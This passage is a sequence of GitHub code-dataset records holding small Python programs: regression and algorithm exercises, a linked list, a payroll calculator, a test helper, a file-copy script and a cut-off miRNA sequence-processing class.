np.ones((m,1))\nafter_scaling_of_features = np.concatenate((ones,scale_x1,scale_x2,scale_x3,scale_x4,scale_x5,scale_x6), axis=1)\ntheta = np.zeros((7,1))\niterations = 200000\nalpha = 0.01\n\n# Defining Cost function\n\ndef Get_cost_J(X,Y,Theta):\n Pridictions = np.dot(X,Theta)\n Error = Pridictions-Y\n SqrError = np.power(Error,2)\n SumSqrError = np.sum(SqrError)\n J = (1/2*m)*SumSqrError # 
Where m is tototal number of rows\n return J\n\n#Defining Gradient Decent Algorithm\n\ndef Gradient_Decent_Algo(X,Y,Theta,alpha,itrations,m):\n histroy = np.zeros((itrations,1))\n for i in range(itrations):\n temp =(np.dot(X,Theta))-Y\n temp = (np.dot(X.T,temp))*alpha/m\n Theta = Theta - temp\n histroy[i] = Get_cost_J(X, Y, Theta)\n \n return (histroy,Theta)\n\nh,t = Gradient_Decent_Algo(after_scaling_of_features, scale_y, theta, alpha, iterations, m)\n\n#Values Of Theta\n\nt0 = t[0,0]\nt1 = t[1,0]\nt2 = t[2,0]\nt3 = t[3,0]\nt4 = t[4,0]\nt5 = t[5,0]\nt6 = t[6,0]\n\n#Now For Testing Of 50 Rows\n\ntesting_x1 = CSV_Data.iloc[155:206,0:1]\ntesting_x2 = CSV_Data.iloc[155:206,1:2]\ntesting_x3 = CSV_Data.iloc[155:206,2:3]\ntesting_x4 = CSV_Data.iloc[155:206,3:4]\ntesting_x5 = CSV_Data.iloc[155:206,4:5]\ntesting_x6 = CSV_Data.iloc[155:206,5:6]\ntesting_y = CSV_Data.iloc[155:206,6:7]\n\n#Scaling Of Testing Features\n\nscale_testing_x1 = scaling_of_X_features(testing_x1)\nscale_testing_x2 = scaling_of_X_features(testing_x2)\nscale_testing_x3 = scaling_of_X_features(testing_x3)\nscale_testing_x4 = scaling_of_X_features(testing_x4)\nscale_testing_x5 = scaling_of_X_features(testing_x5)\nscale_testing_x6 = scaling_of_X_features(testing_x6)\n\n#Now we find out prediction of testing data\n\noness = np.ones((50,1))\nconcatenation_of_features = np.concatenate((oness,scale_testing_x1,scale_testing_x2,scale_testing_x3,scale_testing_x4,scale_testing_x5,scale_testing_x6), axis=1)\nprediction_of_testing_features = np.dot(concatenation_of_features,t)\n\nmin_test_y = testing_y.min()\nmax_test_y = testing_y.max()\n\nfinal_prediction_salary_price = np.zeros([50,1])\nfor i in range(0,50):\n final_prediction_salary_price[i,0] = prediction_of_testing_features[i,0]*(max_test_y-min_test_y)+min_test_y\nprint(final_prediction_salary_price) 
\n\n\n\n\n\n","repo_name":"Roshaan-Ullah-Zaheer1/ML-Code-Samples","sub_path":"excercise_3_Linear_Regression.py","file_name":"excercise_3_Linear_Regression.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"70024654495","text":"from typing import NamedTuple\nfrom enum import Enum, auto\n\n\nclass Coordinate(NamedTuple):\n row: int\n column: int\n\n\nclass FoldDirection(Enum):\n ROW = auto()\n COLUMN = auto()\n\n\nclass Fold(NamedTuple):\n fold_axis: FoldDirection\n place: int\n\n\nmatrix: set[Coordinate] = set()\nfold_instructions: list[Fold] = []\n\n\nwith open(\"day_13/input.txt\") as puzzle_input:\n coordinates, raw_fold_instructions = puzzle_input.read().strip().split(\"\\n\\n\", 2)\n\nfor line in coordinates.split(\"\\n\"):\n column, row = line.strip().split(\",\")\n matrix.add(Coordinate(int(row), int(column)))\n\nfor instruction in raw_fold_instructions.split(\"\\n\"):\n instruction = instruction.rsplit(\" \", 1)\n axis, place = instruction[1].split(\"=\")\n fold_direction: FoldDirection\n if axis == \"x\":\n fold_direction = FoldDirection.COLUMN\n elif axis == \"y\":\n fold_direction = FoldDirection.ROW\n fold_instructions.append(Fold(fold_direction, int(place)))\n\n# Part 1\n\ndef fold_matrix(matrix: set[Coordinate], fold_instructions: list[FoldDirection]) -> set[Coordinate]:\n for fold_instruction in fold_instructions:\n index: int\n if fold_instruction.fold_axis == FoldDirection.ROW:\n index = 0\n elif fold_instruction.fold_axis == FoldDirection.COLUMN:\n index = 1\n\n new_matrix: set[Coordinate] = set()\n for coordinate in matrix:\n if coordinate[index] > fold_instruction.place:\n diff = coordinate[index] - fold_instruction.place\n\n new_coord: Coordinate\n if fold_instruction.fold_axis == FoldDirection.ROW:\n row = coordinate.row - (2 * diff)\n new_coord = Coordinate(row, coordinate.column)\n elif fold_instruction.fold_axis == FoldDirection.COLUMN:\n 
column = coordinate.column - (2 * diff)\n new_coord = Coordinate(coordinate.row, column)\n\n new_matrix.add(new_coord)\n\n else:\n new_matrix.add(coordinate)\n\n matrix = new_matrix\n\n return new_matrix\n\n\nmatrix = fold_matrix(matrix, [fold_instructions.pop(0)])\n\nprint(\"Part 1:\")\nprint(len(matrix))\n\n# Part 2:\n\nmatrix = fold_matrix(matrix, fold_instructions)\n\ndisplay: list[list[str]] = [[\" \" for _ in range(40)] for _ in range(6)]\nfor coordinate in matrix:\n display[coordinate.row][coordinate.column] = \"x\"\n\nfor line in display:\n print(\"\".join(line))\n","repo_name":"ndhansen/advent_of_code_2021","sub_path":"day_13/day_13.py","file_name":"day_13.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"23908987094","text":"# https://www.acmicpc.net/problem/12104\n\n\ndef failure(string):\n table = [0] * len(string)\n j = 0\n for i in range(1, len(string)):\n while j > 0 and string[i] != string[j]:\n j = table[j - 1]\n\n if string[i] == string[j]:\n j += 1\n table[i] = j\n\n return table\n\n\ndef KMP(string, pattern):\n ls = len(string)\n lp = len(pattern)\n table = failure(pattern)\n j = 0\n cnt = 0\n for i in range(ls):\n while j > 0 and string[i] != pattern[j]:\n j = table[j - 1]\n\n if string[i] == pattern[j]:\n if j == lp - 1:\n cnt += 1\n j = table[j]\n else:\n j += 1\n return cnt\n\n\nA = input()\nB = input()\nB *= 2\nprint(KMP(B[:-1], A))\n","repo_name":"h-spear/problem-solving-python","sub_path":"baekjoon/string/cycle_permutation.py","file_name":"cycle_permutation.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"22843693207","text":" # Error handling\n\n# sample usage\n# try: # will try run this code in try block, only if any error occur control get into except block\n# age = int(input(\"what is your age? 
\"))\n# except: # if there is any error then access will go into the except block and does whatever inside except\n# print(\"please enter a number\")\n\n# built in exceptions list: https://docs.python.org/3/library/exceptions.html\n# We can directly mention these in the except\n\nwhile True: # using while loop to end on receiving the valid value\n try:\n age = int(input(\"what is your age? \"))\n except ValueError:\n print('please enter a Number')\n else: # if value is number then we can break loop\n print(\"Thanks!!\")\n break\n","repo_name":"Sridhar36/python_zero_to_master","sub_path":"7_advanced_python_4_error_handling/error_handling_use_try_except_else_blocks_1.py","file_name":"error_handling_use_try_except_else_blocks_1.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"33"} +{"seq_id":"21488339311","text":"import random\n\n\nclass Node:\n data = None\n next = None\n prev = None\n\n def __init__(self, data, prev=None, next=None):\n self.data = data\n self.next = next\n self.prev = prev\n\n def __str__(self):\n return str(self.data)\n\n\nclass Dlinkedl:\n head = None\n last = None\n length = 0\n\n def insert_at_begin(self, data):\n node = Node(data)\n if self.head is None:\n self.head = node\n self.last = node\n else:\n self.head.prev = node\n node.next = self.head\n self.head = node\n self.length += 1\n\n def insert_at_end(self, data):\n node = Node(data)\n self.last.next = node\n node.prev = self.last\n self.last = node\n self.length += 1\n\n def delete(self, node):\n pass\n\n def delete_first(self):\n head = self.head\n self.head = head.next\n self.head.prev = None\n head = None\n self.length -= 1\n\n def delete_last(self):\n last = self.last\n self.last = last.prev\n self.last.next = None\n last = None\n\n self.length -= 1\n\n def insert(self, node, data):\n new_node = Node(data)\n next = node.next\n node.next = new_node\n new_node.prev = node\n next.prev = new_node\n 
new_node.next = next\n\n def find(self, data):\n current = self.head\n while (current is not None):\n if current.data == data:\n return current\n current = current.next\n\n return None\n\n def display_forward(self):\n str_rpr = \"\"\n current = self.head\n while current is not None:\n str_rpr = self._format(str_rpr, current, current.next)\n current = current.next\n\n print(str_rpr)\n\n def display_backward(self):\n str_rpr = \"\"\n current = self.last\n while (current is not None):\n str_rpr = self._format(str_rpr, current, current.prev)\n current = current.prev\n print(str_rpr)\n\n @staticmethod\n def _format(string, data, last):\n if last is not None:\n string += \"{},\".format(data)\n else:\n string += \"{}\".format(data)\n\n return string\n\n def sort(self):\n for _ in range(0, self.length):\n current = self.head\n while current.next is not None:\n if current.data > current.next.data:\n tmp = current.data\n current.data = current.next.data\n current.next.data = tmp\n current = current.next\n","repo_name":"inkoguto/ds","sub_path":"ds/dlinkedl.py","file_name":"dlinkedl.py","file_ext":"py","file_size_in_byte":2619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"25454403026","text":"#!/usr/bin/python3\nimport sys\nargv = sys.argv\n\n\ndef main():\n\n length = len(argv)\n\n if length > 2:\n print(\"{} arguments:\".format(length - 1))\n for i in range(1, length):\n print(\"{}: {}\".format(i, argv[i]))\n\n elif length == 1:\n print(\"0 arguments.\")\n\n elif length == 2:\n print(\"1 argument:\")\n print(\"{}: {}\".format(length - 1, argv[1]))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"callmejoee/alx-higher_level_programming","sub_path":"0x02-python-import_modules/2-args.py","file_name":"2-args.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20966745958","text":"kodeKaryawan = 
input(\"Masukkan kode karyawan : \")\nnamaKaryawan = input(\"Masukkan nama karyawan : \")\ngolongan = input(\"Masukkan golongan : \")\n\nif(golongan == \"A\"):\n gajiPokok = 10000000\n potongan = 2.5\n jumlahPotongan = 2.5 / 100 * 10000000\n \nelif(golongan == \"B\"):\n gajiPokok = 8500000\n potongan = 2.0\n jumlahPotongan = 2. / 100 * 8500000\n \nelif(golongan == \"C\"):\n gajiPokok = 7000000\n potongan = 1.5\n jumlahPotongan = 1.5 / 100 * 7000000\n \nelif(golongan == \"D\"):\n gajiPokok = 5500000\n potongan = 1.0\n jumlahPotongan = 1.0 / 100 * 5500000\n\nstatus = int (input (\"Masukkan status(1: menikah, 2: belum) : \"))\nif(status == 1):\n tunjanganMenikah = gajiPokok * 10/100\n jumlahAnak = int(input (\"Masukkan jumlah anak : \"))\n tunjanganAnak = gajiPokok * 5/100 * jumlahAnak\nelif(status==2):\n tunjanganMenikah = 0\n jumlahAnak = 0\n tunjanganAnak = 0\n\nprint(\"====================================\")\n\nprint(\"STRUK RINCIAN GAJI KARYAWAN\")\n\nprint(\"-----------------------------------------------------------\")\n\nprint(\"Nama Karyawan : \" + namaKaryawan + \"(Kode Karyawan : \" + str(kodeKaryawan) + \")\")\nprint(\"Golongan : \" + golongan)\n\nif(status == 1):\n print (\"Status Menikah : Sudah Menikah\")\n print (\"Jumlah Anak : \" , jumlahAnak)\nelse:\n print (\"Status Menikah : Belum Menikah\")\n\nprint(\"-----------------------------------------------------------\")\n\nprint(\"Gaji Pokok : Rp\" + str(gajiPokok))\nprint(\"Tunjangan Istri/Suami : Rp\" + str(tunjanganMenikah))\nprint(\"Tunjangan Anak : Rp\" + str(tunjanganAnak))\n\nprint(\"-----------------------------------------------------------\")\n\ngajiKotor = gajiPokok + tunjanganMenikah + tunjanganAnak\nprint(\"Gaji Kotor : Rp\" + str(gajiKotor))\npotonganGaji = int(gajiKotor * potongan/100)\nprint(\"Potongan (\" + str(potongan) + \"%): Rp\" + str(potonganGaji))\n\nprint(\"-----------------------------------------------------------\")\n\ngajiBersih = gajiKotor - potonganGaji\nprint(\"Gaji 
Bersih : Rp\" + str(gajiBersih))\n\n\n\n\n\n\n\n\n","repo_name":"LucianaYansan/PythonProjectsProtek","sub_path":"Praktikum 5/Latihan 01/latihan5.py","file_name":"latihan5.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29947596279","text":"import traceback\n\nimport gevent\nimport structlog\nfrom gevent.event import AsyncResult\n\nlog = structlog.get_logger(__name__)\n\n\ndef raise_on_failure(raiden_apps, test_function, **kwargs):\n \"\"\"Wait on the result for the test function and any of the apps.\n\n This utility should be used for happy path testing with more than one app.\n This will raise if any of the apps is killed.\n \"\"\"\n result = AsyncResult()\n\n # Do not use `link` or `link_value`, an app an be stopped to test restarts.\n for app in raiden_apps:\n assert app.raiden, \"The RaidenService must be started\"\n app.raiden.link_exception(result)\n\n test_greenlet = gevent.spawn(test_function, **kwargs)\n test_greenlet.link(result)\n\n # Returns if either happens:\n # - The test finished (successfully or not)\n # - One of the apps crashed during the test\n try:\n result.get()\n except: # noqa\n # Print the stack trace of the running test to know in which line the\n # test is waiting.\n #\n # This may print a duplicated stack trace, when the test fails.\n log.exception(\n \"Test failed\",\n test_traceback=\"\".join(traceback.format_stack(test_greenlet.gr_frame)),\n all_tracebacks=\"\\n\".join(gevent.util.format_run_info()),\n )\n\n raise\n","repo_name":"prospect-man/raiden","sub_path":"raiden/tests/utils/detect_failure.py","file_name":"detect_failure.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"36822378162","text":"'''\n\nKaren Sommer\n\nCS 521 Spring 2021\n\nAssignment 11\n\nProblem 2 pages 685\n\n'''\n\nimport os\nimport shutil\n\n\n#path = 
'/Users/karensommer/github/CS521_InformationStructuresWithPython/ksommer@bu_edu_hw_11/hw_11_2.txt'\npath = 'hw_11_2.txt'\n#target= '/Users/karensommer/github/CS521_InformationStructuresWithPython/ksommer@bu_edu_hw_11/target_11_2.txt'\ntarget='target_11_2.txt'\n\nif target.rfind('/')!=-1:\n target_folder=(target[:target.rfind('/')])\n # if target folder exists\n isExist_trg = os.path.exists(target_folder)\nelse:\n #assign the true by default because is going to store it in the root folder\n isExist_trg=True\n\n# check if source path exists\nisExist_src = os.path.exists(path)\n#get extension of dource path\nextension = os.path.splitext(path)[1]\nif extension=='.txt' and isExist_src and isExist_trg:\n # check if the file exists\n isExist_file_target = os.path.exists(target)\n #print(isExist_file_target)\n if isExist_file_target:\n option=input('Do you want to overwrite the file y/n ?')\n if option.lower()=='y':\n #Make the copy\n shutil.copyfile(path, target)\n print('File copied!')\n else:\n print('File not copied')\n else:\n #Make the copy\n shutil.copyfile(path, target)\nelse:\n print('Invalid extension or src file not found or dest path not found')\n","repo_name":"ksommerh94/CS521_InformationStructuresWithPython","sub_path":"ksommer@bu_edu_hw_11/ksommer@bu_edu_hw_11_2.py","file_name":"ksommer@bu_edu_hw_11_2.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22947740149","text":"'''\nhistory = 2013.05.13, 2013_05_19, 2013_05_24\n'''\n#-----------------------------------------------------------------------------------------------\nimport os, Raxpy3Libbasic_2013_06_10\n#-----------------------------------------------------------------------------------------------\nRaxLib = Raxpy3Libbasic_2013_06_10\n\nclass dataTCGA:\n \n def __init__(self):\n \n #file list\n self.isomiR_class_list = []\n \n #genome file\n self.hg_obj_name = ['chr1.fa', 'chr2.fa', 'chr3.fa', 
'chr4.fa', 'chr5.fa',\n 'chr6.fa', 'chr7.fa', 'chr8.fa', 'chr9.fa', 'chr10.fa',\n 'chr11.fa', 'chr12.fa', 'chr13.fa', 'chr14.fa', 'chr15.fa',\n 'chr16.fa', 'chr17.fa', 'chr18.fa', 'chr19.fa', 'chr20.fa',\n 'chr21.fa', 'chr22.fa', 'chrM.fa', 'chrX.fa', 'chrY.fa']\n self.hg_obj_index = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10',\n '11', '12', '13', '14', '15', '16', '17', '18', '19', '20',\n '21', '22', 'M', 'X', 'Y']\n self.hg_obj_list = [[]]*25\n \n #percursor file\n self.percursor = 'obj'\n \n #hsamiRNA file\n self.mature_miRNA = 'obj'\n \n #hsamatchtable\n self.matchtable = 'obj'\n \n #hsalocationtable\n self.locationtable = 'obj'\n \n #-----------------------------------------------------------------------------------------------\n \n def openHumangenome(self):\n \n ori_path = os.getcwd()\n os.chdir('/home/tin/Lib/Lib/hg19')\n chromosome = 'obj'\n \n for genomefile in self.hg_obj_name:\n \n print(str(genomefile)+' is opening !! (' + str(len([x for x in self.hg_obj_list if x != []])) + '/25)')\n chromosome = RaxLib.openFastAfile()\n chromosome.open(genomefile)\n self.hg_obj_list[self.hg_obj_name.index(genomefile)] = chromosome\n \n os.chdir(ori_path)\n \n return\n \n #-----------------------------------------------------------------------------------------------\n \n def openhsamiRNA(self):\n \n ori_path = os.getcwd()\n #take miRNA from mature\n os.chdir('/home/tin/Lib/Lib/hsamiRNA/')\n mature_miRNA = RaxLib.openFastAfile()\n mature_miRNA.open('hsaV1.fa')\n self.mature_miRNA = mature_miRNA\n \n os.chdir(ori_path)\n \n return\n \n #-----------------------------------------------------------------------------------------------\n \n def openpercursor(self):\n \n ori_path = os.getcwd()\n #take percursor from hairpin\n os.chdir('/home/tin/Lib/Lib/miRNApercursor')\n percursor = RaxLib.openFastAfile()\n percursor.open('hairpin.fa')\n self.percursor = percursor\n \n os.chdir(ori_path)\n \n return\n \n 
#-----------------------------------------------------------------------------------------------\n \n def openmatchtable(self):\n \n ori_path = os.getcwd()\n #take hsaprecursor and hsamiRNA matchtable\n os.chdir('/home/tin/Lib/Lib/hsa_match_table/')\n matchtable = RaxLib.tabfilewithtitle()\n matchtable.open('group_table8.txt', 'order')\n self.matchtable = matchtable\n \n os.chdir(ori_path)\n \n return\n \n #-----------------------------------------------------------------------------------------------\n \n def openlocationtable(self):\n \n ori_path = os.getcwd()\n #take hsaprecursor and hsamiRNA locationtable\n os.chdir('/home/tin/Lib/Lib/hsagff3_location/')\n gff3table = RaxLib.tabfilewithtitle()\n gff3table.open('hsagff3modifyhsaV2.txt', 'order')\n self.locationtable = gff3table\n \n os.chdir(ori_path)\n \n return\n \n #-----------------------------------------------------------------------------------------------\n \n class isomiR:\n \n def __init__(self):\n \n #miRNA\n self.miRNA = \"\"\n self.situation = \"\"\n self.mature_3p_start = 0.0\n self.mature_3p_end = 0.0\n self.mature_5p_start = 0.0\n self.mature_5p_end = 0.0\n \n #percursor\n self.percursor_hairpin = \"\"\n self.percursor_sequence = \"\"\n self.percursor_h_sequence_ali = \"\"\n self.percursor_genome_left = 0\n self.percursor_genome_right = 0\n \n #genome\n self.genome_sequence = \"\"\n self.genome_chromosome = \"\"\n self.genome_version = \"\"\n self.genome_strand = \"\"\n self.genome_left = 0\n self.genome_right = 0\n \n #table\n self.isomiR_tabfilewithtitle = 'obj'\n \n #-----------------------------------------------------------------------------------------------\n \n def process1(self, tabfilewithtitle = 'table obj', genomedataTCGA = 'dataTCGA obj'): #find sequence for isomiR\n \n ori_path = os.getcwd()\n \n tabT = tabfilewithtitle\n C1 = genomedataTCGA\n \n miRNA_list = tabT.title_box[tabT.title_dicX['miRNA_ID']-1]\n \n if len({}.fromkeys(miRNA_list).keys()) == 0:\n print('miRNA input Error 
!')\n quit()\n elif len({}.fromkeys(miRNA_list).keys()) == 1:\n miRNA = \"\".join({}.fromkeys(miRNA_list).keys())\n else:\n print('miRNA is more then one type in this block.')\n quit()\n self.miRNA = miRNA\n \n print(self.miRNA+' in processing 1 !')\n sequence_list = []\n main_key_list = tabT.title_box[tabT.title_dicX['isoform_coords']-1]\n \n left_location_list = []\n right_location_list = []\n for key in main_key_list:\n \n W = \"\"\n E = key.split(':')\n \n #take the chromosome obj\n os.chdir('/home/tin/Lib/Lib/hg19')\n chromosome = 'obj'\n \n W = \"\".join([x for x in C1.hg_obj_index if x.find(str(E[1]).upper()) != -1 and len(x) == len(str(E[1]).upper())]) \n \n if C1.hg_obj_list[C1.hg_obj_index.index(W)] == []:\n print(str(C1.hg_obj_name[C1.hg_obj_index.index(W)])+' is opening !! (' + str(len([x for x in C1.hg_obj_list if x != []])) + '/25)')\n chromosome = RaxLib.openFastAfile()\n chromosome.open(C1.hg_obj_name[C1.hg_obj_index.index(W)])\n C1.hg_obj_list[C1.hg_obj_index.index(W)] = chromosome\n \n \n else:\n chromosome = C1.hg_obj_list[C1.hg_obj_index.index(W)]\n \n os.chdir(ori_path)\n \n #take the sequence from chromosome obj \n isomiR_sequence = \"\"\n left_location = \"\".join(E[2].split('-')[0])\n left_location_list.append(left_location)\n right_location = \"\".join(E[2].split('-')[1])\n right_location_list.append(right_location)\n if E[-1] == '+':\n isomiR_sequence = chromosome.read(chromosome.FastA_dictionary.keys()[0])[int(left_location)-1:int(right_location)]\n elif E[-1] == '-':\n isomiR_sequence = chromosome.read(chromosome.FastA_dictionary.keys()[0])[int(left_location)-1:int(right_location)]\n isomiR_sequence = RaxLib.ntComRev(isomiR_sequence, 'Ucase', 'r')\n sequence_list.append(isomiR_sequence.replace('T', 'U'))\n \n left_location_list.sort()\n right_location_list.sort()\n genome_left = int(left_location_list[0]) - 50\n genome_right = int(right_location_list[-1]) + 50\n \n #add the sequence_list to table obj\n tabT.append('X', 'isomiR_sequence', 
sequence_list)\n tabT.printtable()\n \n self.isomiR_tabfilewithtitle = tabT\n self.genome_left = genome_left\n self.genome_right = genome_right\n self.genome_chromosome = main_key_list[0].split(':')[1]\n self.genome_version = main_key_list[0].split(':')[0]\n self.genome_strand = main_key_list[0].split(':')[-1]\n \n if self.genome_right-self.genome_left < 200:\n self.situation = 'OK'\n else:\n self.situation = 'NO'\n \n genome_sequence = chromosome.read(chromosome.FastA_dictionary.keys()[0])[self.genome_left-1:self.genome_right]\n if main_key_list[0].split(':')[-1] == '+':\n genome_sequence = genome_sequence\n elif main_key_list[0].split(':')[-1] == '-':\n genome_sequence = RaxLib.ntComRev(genome_sequence, 'Ucase', 'r')\n self.genome_sequence = genome_sequence.upper()\n \n Num = \"\".join(filter(str.isdigit, self.miRNA))\n miRNA_ID = \"\".join([x for x in C1.mature_miRNA.FastA_dictionary.keys() if Num in x])\n if miRNA_ID == \"\":\n self.situation = 'NO'\n else:\n self.situation = 'OK'\n \n os.chdir(ori_path)\n \n return tabT\n \n def process2(self, tabfilewithtitle = 'table obj', genomedataTCGA = 'dataTCGA obj'): #define sequence_ali for isomiR\n \n ori_path = os.getcwd()\n \n tabT = tabfilewithtitle\n C1 = genomedataTCGA\n print(self.miRNA+' in processing 2 !')\n \n if self.situation == 'OK':\n \n main_key_list = tabT.title_box[tabT.title_dicX['isoform_coords']-1]\n \n genome_sequence = self.genome_sequence\n \n percursor_sequence = genome_sequence.replace('T', 'U')\n \n #make sequence_ali of isomiR in List\n seq_ali = []\n for key in main_key_list:\n \n \n Y = ['.']*len(percursor_sequence)\n \n X = []\n seq_of_table_1 = tabT.read('isomiR_sequence', key).upper().replace('T', 'U')\n if seq_of_table_1 in percursor_sequence:\n nt_index = percursor_sequence.find(seq_of_table_1)\n \n for nt in seq_of_table_1:\n X.append(nt)\n \n i = 1\n while i < len(X)+1:\n Y[nt_index+i-1] = X[i-1]\n i = i + 1\n \n seq_ali.append(\"\".join(Y))\n \n #add the sequence_list to table 
obj\n tabT.append('X', 'isomiR_sequence_alignment', seq_ali)\n tabT.printtable()\n \n self.isomiR_tabfilewithtitle = tabT\n \n os.chdir(ori_path)\n \n return tabT\n \n else:\n main_key_list = tabT.title_box[tabT.title_dicX['isoform_coords']-1]\n seq_ali = ['na']*len(main_key_list)\n \n #add the sequence_list to table obj\n tabT.append('X', 'isomiR_sequence_alignment', seq_ali)\n tabT.printtable()\n \n self.isomiR_tabfilewithtitle = tabT\n \n os.chdir(ori_path)\n \n return tabT\n \n def process3(self, tabfilewithtitle = 'table obj', genomedataTCGA = 'dataTCGA obj'): #It is broken\n \n ori_path = os.getcwd()\n \n tabT = tabfilewithtitle\n C1 = genomedataTCGA\n \n if self.situation == 'OK':\n \n main_key_list = tabT.title_box[tabT.title_dicX['isoform_coords']-1]\n mature_miRNA_key_list = [x.lower() for x in C1.mature_miRNA.FastA_dictionary.keys()]\n \n #definite the isomiR type\n ##find 'MIMA'\n in_frame_list = []\n unannotated_list = []\n out_frame_list = []\n for key in main_key_list:\n \n result = tabT.read('miRNA_region', key)\n \n if 'unannotated' in result and [x for x in mature_miRNA_key_list if filter(str.isdigit, self.miRNA) in x] != []:\n unannotated_list.append(key)\n elif result.find('unannotated') == -1:\n if 'MIMA' in result:\n in_frame_list.append(key)\n elif result.find('MIMA') == -1:\n out_frame_list.append(key)\n else:\n print(str(miRNA)+' '+str(key)+' '+'is no value to defind isomiR type')\n quit()\n else:\n print(str(miRNA)+' '+str(key)+' '+'has unexcept type')\n quit()\n \n #print in_frame_list\n \n ##unexcept\n if unannotated_list == []:\n \n ##define miRNA sequence and arm\n miRNA_5p_sequence = {}\n miRNA_3p_sequence = {}\n for key in in_frame_list:\n result = tabT.read('miRNA_region', key)\n Num = result.split(',')[1]\n \n miRNA_ID = \"\".join([x for x in C1.mature_miRNA.FastA_dictionary.keys() if Num in x])\n \n if '5p' in miRNA_ID:\n miRNA_5p_sequence[miRNA_ID] = C1.mature_miRNA.FastA_dictionary[miRNA_ID].replace('T', 'U')\n elif '3p' in 
miRNA_ID:\n miRNA_3p_sequence[miRNA_ID] = C1.mature_miRNA.FastA_dictionary[miRNA_ID].replace('T', 'U')\n else:\n print(str(self.miRNA)+' '+\"does't find the miNRA arm\")\n quit()\n \n ##define arm group\n miRNA_5p_list = []\n miRNA_3p_list = []\n for key in in_frame_list:\n result = tabT.read('miRNA_region', key)\n Num = result.split(',')[1]\n \n if len(miRNA_5p_sequence.keys()) != 0 and len(miRNA_3p_sequence.keys()) != 0:\n if Num in \"\".join(miRNA_5p_sequence.keys()[0]):\n miRNA_5p_list.append(key)\n elif Num in \"\".join(miRNA_3p_sequence.keys()[0]):\n miRNA_3p_list.append(key)\n else:\n print(str(miRNA_ID)+' '+key+' '+\"can't group in arm group !!\")\n quit()\n \n elif len(miRNA_5p_sequence.keys()) != 0 and len(miRNA_3p_sequence.keys()) == 0:\n if Num in \"\".join(miRNA_5p_sequence.keys()[0]):\n miRNA_5p_list.append(key)\n else:\n print(str(miRNA_ID)+' '+key+' '+\"can't group in arm group !!\")\n quit()\n \n elif len(miRNA_5p_sequence.keys()) == 0 and len(miRNA_3p_sequence.keys()) != 0:\n if Num in \"\".join(miRNA_3p_sequence.keys()[0]):\n miRNA_3p_list.append(key)\n else:\n print(str(miRNA_ID)+' '+key+' '+\"can't group in arm group !!\")\n quit()\n \n else:\n print('The '+self.miRNA+' is fucking shit!')\n quit()\n \n ##define isomiR type\n ###find 0,0 type\n zerozero_5p_type = \"\"\n zerozero_3p_type = \"\"\n zerozero_5p_start_number = 0\n zerozero_5p_end_number = 0\n zerozero_3p_start_number = 0\n zerozero_3p_end_number = 0\n ali_sequence_list = tabT.title_box[tabT.title_dicX['isomiR_sequence_alignment']-1]\n if ali_sequence_list[0] != 'na':\n for ali_sequence in ali_sequence_list:\n \n if len(miRNA_5p_sequence.keys()) != 0 and len(miRNA_3p_sequence.keys()) != 0:\n W5p = miRNA_5p_sequence[miRNA_5p_sequence.keys()[0]]\n W3p = miRNA_3p_sequence[miRNA_3p_sequence.keys()[0]]\n if \"\".join([x for x in ali_sequence.split('.') if x != \"\"]) == W5p:\n zerozero_5p_type = ali_sequence\n \n Array = ali_sequence.split('.')\n seq_in_array = \"\".join([x for x in Array 
if x != \"\"])\n zerozero_5p_start_number = Array.index(seq_in_array)\n \n Array.reverse()\n seq_in_array = \"\".join([x for x in Array if x != \"\"])\n zerozero_5p_end_number = Array.index(seq_in_array)\n \n elif \"\".join([x for x in ali_sequence.split('.') if x != \"\"]) == W3p:\n zerozero_3p_type = ali_sequence\n \n Array = ali_sequence.split('.')\n seq_in_array = \"\".join([x for x in Array if x != \"\"])\n zerozero_3p_start_number = Array.index(seq_in_array)\n \n Array.reverse()\n seq_in_array = \"\".join([x for x in Array if x != \"\"])\n zerozero_3p_end_number = Array.index(seq_in_array)\n \n else:\n zerozero_5p_type = '....'+W5p+'....'\n zerozero_3p_type = '....'+W3p+'....'\n zerozero_5p_start_number = 4\n zerozero_5p_end_number = 4\n zerozero_3p_start_number = 4\n zerozero_3p_end_number = 4\n \n ###find other type\n isomiR_start_type_dic = {}\n isomiR_end_type_dic = {}\n for key in miRNA_5p_list:\n \n result = tabT.read('isomiR_sequence_alignment', key)\n Array = result.split('.')\n isomiR_start_type_dic[key] = Array.index(\"\".join([x for x in Array if x != \"\"])) - zerozero_5p_start_number\n \n Array.reverse()\n isomiR_end_type_dic[key] = Array.index(\"\".join([x for x in Array if x != \"\"])) - zerozero_5p_end_number\n \n for key in miRNA_3p_list:\n \n result = tabT.read('isomiR_sequence_alignment', key)\n Array = result.split('.')\n isomiR_start_type_dic[key] = Array.index(\"\".join([x for x in Array if x != \"\"])) - zerozero_3p_start_number\n \n Array.reverse()\n isomiR_end_type_dic[key] = Array.index(\"\".join([x for x in Array if x != \"\"])) - zerozero_3p_end_number\n \n elif len(miRNA_5p_sequence.keys()) != 0 and len(miRNA_3p_sequence.keys()) == 0:\n W5p = miRNA_5p_sequence[miRNA_5p_sequence.keys()[0]]\n if \"\".join([x for x in ali_sequence.split('.') if x != \"\"]) == W5p:\n zerozero_5p_type = ali_sequence\n \n Array = ali_sequence.split('.')\n seq_in_array = \"\".join([x for x in Array if x != \"\"])\n zerozero_5p_start_number = 
